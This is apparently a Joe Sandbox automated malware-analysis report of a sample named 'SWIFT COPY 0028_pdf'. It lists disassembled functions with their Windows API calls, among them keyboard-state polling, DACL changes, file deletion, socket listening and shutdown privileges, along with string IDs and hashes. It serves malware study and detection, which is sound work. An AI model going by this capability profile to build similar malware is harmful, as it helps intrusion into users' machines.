                                                                                    • FindFirstFileW.KERNEL32(?,?,76228FB0,?,00000000), ref: 00971CAB
                                                                                    • _wcscmp.LIBCMT ref: 00971CC0
                                                                                    • _wcscmp.LIBCMT ref: 00971CD7
                                                                                      • Part of subcall function 00966BD4: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00966BEF
                                                                                    • FindNextFileW.KERNEL32(00000000,?), ref: 00971D06
                                                                                    • FindClose.KERNEL32(00000000), ref: 00971D11
                                                                                    • FindFirstFileW.KERNEL32(*.*,?), ref: 00971D2D
                                                                                    • _wcscmp.LIBCMT ref: 00971D54
                                                                                    • _wcscmp.LIBCMT ref: 00971D6B
                                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00971D7D
                                                                                    • SetCurrentDirectoryW.KERNEL32(009D39FC), ref: 00971D9B
                                                                                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 00971DA5
                                                                                    • FindClose.KERNEL32(00000000), ref: 00971DB2
                                                                                    • FindClose.KERNEL32(00000000), ref: 00971DC2
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                                                                                    • String ID: *.*
                                                                                    • API String ID: 1824444939-438819550
                                                                                    • Opcode ID: f6746239ce7286d6611f1ff612c29078f6c49c8b2029a8e81b424c879cd466ab
                                                                                    • Instruction ID: c30f93f2c76a34e9522b06909c51de1dd98c22b7f02b34d741dd947c7f83d2a1
                                                                                    • Opcode Fuzzy Hash: f6746239ce7286d6611f1ff612c29078f6c49c8b2029a8e81b424c879cd466ab
                                                                                    • Instruction Fuzzy Hash: B7313933505619ABCF20AFA8DC09BDE37AC9F45324F148552F809A31D0DB70DE85DE90
                                                                                    Function 00927D19 Relevance: 23.7, APIs: 2, Strings: 11, Instructions: 962COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: _memset
                                                                                    • String ID: Q\E$[$[:<:]]$[:>:]]$\$\$\$\b(?<=\w)$\b(?=\w)$]$^
                                                                                    • API String ID: 2102423945-2023335898
                                                                                    • Opcode ID: f20d50e9c8e66e6456660af15e20cdd10ca3c398bcc476f446cff52f00bf8563
                                                                                    • Instruction ID: 7a1d9f79c03198aa27eb3e10424020f4099d26664ef255677fa44a8aa3829ba9
                                                                                    • Opcode Fuzzy Hash: f20d50e9c8e66e6456660af15e20cdd10ca3c398bcc476f446cff52f00bf8563
                                                                                    • Instruction Fuzzy Hash: 8E82BF71D04229CBCF24CF98D8907AEF7B5BF48310F2585AAD819BB295E7349D81CB90
                                                                                    Function 0097091D Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 185timeCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetLocalTime.KERNEL32(?), ref: 009709DF
                                                                                    • SystemTimeToFileTime.KERNEL32(?,?), ref: 009709EF
                                                                                    • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 009709FB
                                                                                    • __wsplitpath.LIBCMT ref: 00970A59
                                                                                    • _wcscat.LIBCMT ref: 00970A71
                                                                                    • _wcscat.LIBCMT ref: 00970A83
                                                                                    • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00970A98
                                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00970AAC
                                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00970ADE
                                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00970AFF
                                                                                    • _wcscpy.LIBCMT ref: 00970B0B
                                                                                    • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00970B4A
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: CurrentDirectoryTime$File$Local_wcscat$System__wsplitpath_wcscpy
                                                                                    • String ID: *.*
                                                                                    • API String ID: 3566783562-438819550
                                                                                    • Opcode ID: b93a123ec4c7722f364446ee47ea1e030229317c04422ece3c7f0d76b360e5f0
                                                                                    • Instruction ID: 61ca6125bacfb6b184e0637b4799aa05be3a5c7e6979158a033458b1043f9f2f
                                                                                    • Opcode Fuzzy Hash: b93a123ec4c7722f364446ee47ea1e030229317c04422ece3c7f0d76b360e5f0
                                                                                    • Instruction Fuzzy Hash: 9A6129B25083059FDB10EF60C885A9EB3E8FFC9314F04895AF999C7251DB35EA45CB92
                                                                                    Function 0095A66C Relevance: 21.2, APIs: 14, Instructions: 178memoryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 0095ABBB: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 0095ABD7
                                                                                      • Part of subcall function 0095ABBB: GetLastError.KERNEL32(?,0095A69F,?,?,?), ref: 0095ABE1
                                                                                      • Part of subcall function 0095ABBB: GetProcessHeap.KERNEL32(00000008,?,?,0095A69F,?,?,?), ref: 0095ABF0
                                                                                      • Part of subcall function 0095ABBB: HeapAlloc.KERNEL32(00000000,?,0095A69F,?,?,?), ref: 0095ABF7
                                                                                      • Part of subcall function 0095ABBB: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 0095AC0E
                                                                                      • Part of subcall function 0095AC56: GetProcessHeap.KERNEL32(00000008,0095A6B5,00000000,00000000,?,0095A6B5,?), ref: 0095AC62
                                                                                      • Part of subcall function 0095AC56: HeapAlloc.KERNEL32(00000000,?,0095A6B5,?), ref: 0095AC69
                                                                                      • Part of subcall function 0095AC56: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,0095A6B5,?), ref: 0095AC7A
                                                                                    • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 0095A6D0
                                                                                    • _memset.LIBCMT ref: 0095A6E5
                                                                                    • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 0095A704
                                                                                    • GetLengthSid.ADVAPI32(?), ref: 0095A715
                                                                                    • GetAce.ADVAPI32(?,00000000,?), ref: 0095A752
                                                                                    • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 0095A76E
                                                                                    • GetLengthSid.ADVAPI32(?), ref: 0095A78B
                                                                                    • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 0095A79A
                                                                                    • HeapAlloc.KERNEL32(00000000), ref: 0095A7A1
                                                                                    • GetLengthSid.ADVAPI32(?,00000008,?), ref: 0095A7C2
                                                                                    • CopySid.ADVAPI32(00000000), ref: 0095A7C9
                                                                                    • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 0095A7FA
                                                                                    • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 0095A820
                                                                                    • SetUserObjectSecurity.USER32(?,00000004,?), ref: 0095A834
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                                                    • String ID:
                                                                                    • API String ID: 3996160137-0
                                                                                    • Opcode ID: f11ee1f43af867d3653c6b9d02bb0237f4d11506b41e1b956433aa539e4c907f
                                                                                    • Instruction ID: d73df32b0dbf8356aa530b5474f9e271258c6d48c352185bd7f86ff628a21be3
                                                                                    • Opcode Fuzzy Hash: f11ee1f43af867d3653c6b9d02bb0237f4d11506b41e1b956433aa539e4c907f
                                                                                    • Instruction Fuzzy Hash: A7515D71900219AFDF10DFA6DC44EEEBBB9FF45305F048229F911A7290DB349A09DBA5
                                                                                    Function 009663F9 Relevance: 19.3, APIs: 9, Strings: 2, Instructions: 89fileCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 00966EBB: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00965FA6,?), ref: 00966ED8
                                                                                      • Part of subcall function 009672CB: GetFileAttributesW.KERNEL32(?,00966019), ref: 009672CC
                                                                                    • _wcscat.LIBCMT ref: 00966441
                                                                                    • __wsplitpath.LIBCMT ref: 0096645F
                                                                                    • FindFirstFileW.KERNEL32(?,?), ref: 00966474
                                                                                    • _wcscpy.LIBCMT ref: 009664A3
                                                                                    • _wcscat.LIBCMT ref: 009664B8
                                                                                    • _wcscat.LIBCMT ref: 009664CA
                                                                                    • DeleteFileW.KERNEL32(?), ref: 009664DA
                                                                                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 009664EB
                                                                                    • FindClose.KERNEL32(00000000), ref: 00966506
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: File$Find_wcscat$AttributesCloseDeleteFirstFullNameNextPath__wsplitpath_wcscpy
                                                                                    • String ID: \*.*$p1#v`K$v
                                                                                    • API String ID: 2643075503-1732502266
                                                                                    • Opcode ID: 3c45eb26948c71d1c944ad3208c8844148d180fffffc89d562dcaa2a914657b7
                                                                                    • Instruction ID: 1a19bf48f0ecdafb617b3e16099b835a6224626c435de45ac7a5d2dce3b0477b
                                                                                    • Opcode Fuzzy Hash: 3c45eb26948c71d1c944ad3208c8844148d180fffffc89d562dcaa2a914657b7
                                                                                    • Instruction Fuzzy Hash: 873150B240C384AAC721DBA48885EDBB7DCAF96314F44492EF6D9C3141EB35E509C7A7
                                                                                    Function 00926F07 Relevance: 18.4, Strings: 14, Instructions: 883COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$UCP)$UTF)$UTF16)
                                                                                    • API String ID: 0-4052911093
                                                                                    • Opcode ID: fbfe0007a3a0f65160ca5bf4f3afbedf85ffb1f89515cd764ef7f5be56003988
                                                                                    • Instruction ID: 2a9785e8428d32e72f83466147c2a91945de281c9bd7c2cceee7cfe4cd6b961d
                                                                                    • Opcode Fuzzy Hash: fbfe0007a3a0f65160ca5bf4f3afbedf85ffb1f89515cd764ef7f5be56003988
                                                                                    • Instruction Fuzzy Hash: 94729271E04229DBDF24DF98D8407AEB7B5FF49310F24856AE815EB284DB349E81DB90
                                                                                    Function 009831BC Relevance: 16.9, APIs: 11, Instructions: 397registryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 00983C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00982BB5,?,?), ref: 00983C1D
                                                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0098328E
                                                                                      • Part of subcall function 0092936C: __swprintf.LIBCMT ref: 009293AB
                                                                                      • Part of subcall function 0092936C: __itow.LIBCMT ref: 009293DF
                                                                                    • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 0098332D
                                                                                    • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 009833C5
                                                                                    • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00983604
                                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 00983611
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                                                                                    • String ID:
                                                                                    • API String ID: 1240663315-0
                                                                                    • Opcode ID: 09d77ea0a137ec69b12af7728be5055409dcddbaca6864cbcbe5d218c9a4f72c
                                                                                    • Instruction ID: 7b7ca08810351730619f1cd6587dc53615e7ff68e743874c438bf355840224fb
                                                                                    • Opcode Fuzzy Hash: 09d77ea0a137ec69b12af7728be5055409dcddbaca6864cbcbe5d218c9a4f72c
                                                                                    • Instruction Fuzzy Hash: 9CE14A71604210AFCB14EF29C995E2ABBE8EF89710F04C96DF54ADB361DB34EA05CB51
                                                                                    Function 00962B37 Relevance: 16.6, APIs: 11, Instructions: 119keyboardCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetKeyboardState.USER32(?), ref: 00962B5F
                                                                                    • GetAsyncKeyState.USER32(000000A0), ref: 00962BE0
                                                                                    • GetKeyState.USER32(000000A0), ref: 00962BFB
                                                                                    • GetAsyncKeyState.USER32(000000A1), ref: 00962C15
                                                                                    • GetKeyState.USER32(000000A1), ref: 00962C2A
                                                                                    • GetAsyncKeyState.USER32(00000011), ref: 00962C42
                                                                                    • GetKeyState.USER32(00000011), ref: 00962C54
                                                                                    • GetAsyncKeyState.USER32(00000012), ref: 00962C6C
                                                                                    • GetKeyState.USER32(00000012), ref: 00962C7E
                                                                                    • GetAsyncKeyState.USER32(0000005B), ref: 00962C96
                                                                                    • GetKeyState.USER32(0000005B), ref: 00962CA8
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: State$Async$Keyboard
                                                                                    • String ID:
                                                                                    • API String ID: 541375521-0
                                                                                    • Opcode ID: 5d36fd41f94ec6d1b5394135f3e6281ea0565a26cba550f78b8d070c02900b39
                                                                                    • Instruction ID: a0b50681a320edea76b4917991bb879a07fd4a423ca9b047a222b56bdb38b16b
                                                                                    • Opcode Fuzzy Hash: 5d36fd41f94ec6d1b5394135f3e6281ea0565a26cba550f78b8d070c02900b39
                                                                                    • Instruction Fuzzy Hash: A841A834908FC96DFF359B7489043F9BEA8AF22344F0480D9D9C6566C1DB9899C4D7A2
                                                                                    Function 00976D07 Relevance: 15.1, APIs: 10, Instructions: 83clipboardmemoryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                                                    • String ID:
                                                                                    • API String ID: 1737998785-0
                                                                                    • Opcode ID: 011544f9219bf951630abae15db5d3cde5f8f26d161b6eef8c3d409d8d91d560
                                                                                    • Instruction ID: 4e480268f519f297f277d85c38930c7055236ff3d69a7b39865bc2e466787632
                                                                                    • Opcode Fuzzy Hash: 011544f9219bf951630abae15db5d3cde5f8f26d161b6eef8c3d409d8d91d560
                                                                                    • Instruction Fuzzy Hash: FD21BD32325610AFEB11AF64DC49B6D77A8FF85711F04C41AF94ADB2A1CB34EC009B94
                                                                                    Function 0097C18C Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 232COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 00959ABF: CLSIDFromProgID.OLE32 ref: 00959ADC
                                                                                      • Part of subcall function 00959ABF: ProgIDFromCLSID.OLE32(?,00000000), ref: 00959AF7
                                                                                      • Part of subcall function 00959ABF: lstrcmpiW.KERNEL32(?,00000000), ref: 00959B05
                                                                                      • Part of subcall function 00959ABF: CoTaskMemFree.OLE32(00000000,?,00000000), ref: 00959B15
                                                                                    • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 0097C235
                                                                                    • _memset.LIBCMT ref: 0097C242
                                                                                    • _memset.LIBCMT ref: 0097C360
                                                                                    • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000001), ref: 0097C38C
                                                                                    • CoTaskMemFree.OLE32(?), ref: 0097C397
                                                                                    Strings
                                                                                    • NULL Pointer assignment, xrefs: 0097C3E5
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
                                                                                    • String ID: NULL Pointer assignment
                                                                                    • API String ID: 1300414916-2785691316
                                                                                    • Opcode ID: bb9eac94e94fe38fbca043e70cce0c5670c7e9adc81f737184c74d5bdf6e079e
                                                                                    • Instruction ID: 58edae995161866c4a5be38c16fdb5cbf54c781f13ec5c28c4d85c69be8f4551
                                                                                    • Opcode Fuzzy Hash: bb9eac94e94fe38fbca043e70cce0c5670c7e9adc81f737184c74d5bdf6e079e
                                                                                    • Instruction Fuzzy Hash: 87912DB2D00228ABDB10DF94DC95FEEBBB9EF44710F10815AF519A7291DB709A45CFA0
                                                                                    Function 009679D3 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 58shutdownCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 0095B134: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0095B180
                                                                                      • Part of subcall function 0095B134: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0095B1AD
                                                                                      • Part of subcall function 0095B134: GetLastError.KERNEL32 ref: 0095B1BA
                                                                                    • ExitWindowsEx.USER32(?,00000000), ref: 00967A0F
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                                                    • String ID: $@$SeShutdownPrivilege
                                                                                    • API String ID: 2234035333-194228
                                                                                    • Opcode ID: d3871a31f70324ef5e1750d38f20775997f04b8270490831bc4920c0171b4f51
                                                                                    • Instruction ID: ed9c0181ce3847c20e9bacea71181ad01fb2e05f809c90261911ba5c31e959f9
                                                                                    • Opcode Fuzzy Hash: d3871a31f70324ef5e1750d38f20775997f04b8270490831bc4920c0171b4f51
                                                                                    • Instruction Fuzzy Hash: 14012B7166D2216AF72857F4CC4ABBFB25C9B00359F244924FD13E20C2D5645F0092F0
                                                                                    Function 00978C4F Relevance: 9.1, APIs: 6, Instructions: 83networkCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00978CA8
                                                                                    • WSAGetLastError.WSOCK32(00000000), ref: 00978CB7
                                                                                    • bind.WSOCK32(00000000,?,00000010), ref: 00978CD3
                                                                                    • listen.WSOCK32(00000000,00000005), ref: 00978CE2
                                                                                    • WSAGetLastError.WSOCK32(00000000), ref: 00978CFC
                                                                                    • closesocket.WSOCK32(00000000,00000000), ref: 00978D10
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: ErrorLast$bindclosesocketlistensocket
                                                                                    • String ID:
                                                                                    • API String ID: 1279440585-0
                                                                                    • Opcode ID: ac0e0bbc479382560085d013f78c0c646251455b77ed8229ce611edab998da49
                                                                                    • Instruction ID: 3c53ac05d0410de9187109c190e08217d571c12c47d636b783ad271a8da377f1
                                                                                    • Opcode Fuzzy Hash: ac0e0bbc479382560085d013f78c0c646251455b77ed8229ce611edab998da49
                                                                                    • Instruction Fuzzy Hash: 0F21E4726002109FCB14EF68D949B7E77A9EF89310F148158F95BA72D2CB30AD01DB91
                                                                                    Function 00966532 Relevance: 9.1, APIs: 6, Instructions: 71processCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 00966554
                                                                                    • Process32FirstW.KERNEL32(00000000,0000022C), ref: 00966564
                                                                                    • Process32NextW.KERNEL32(00000000,0000022C), ref: 00966583
                                                                                    • __wsplitpath.LIBCMT ref: 009665A7
                                                                                    • _wcscat.LIBCMT ref: 009665BA
                                                                                    • CloseHandle.KERNEL32(00000000,?,00000000), ref: 009665F9
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
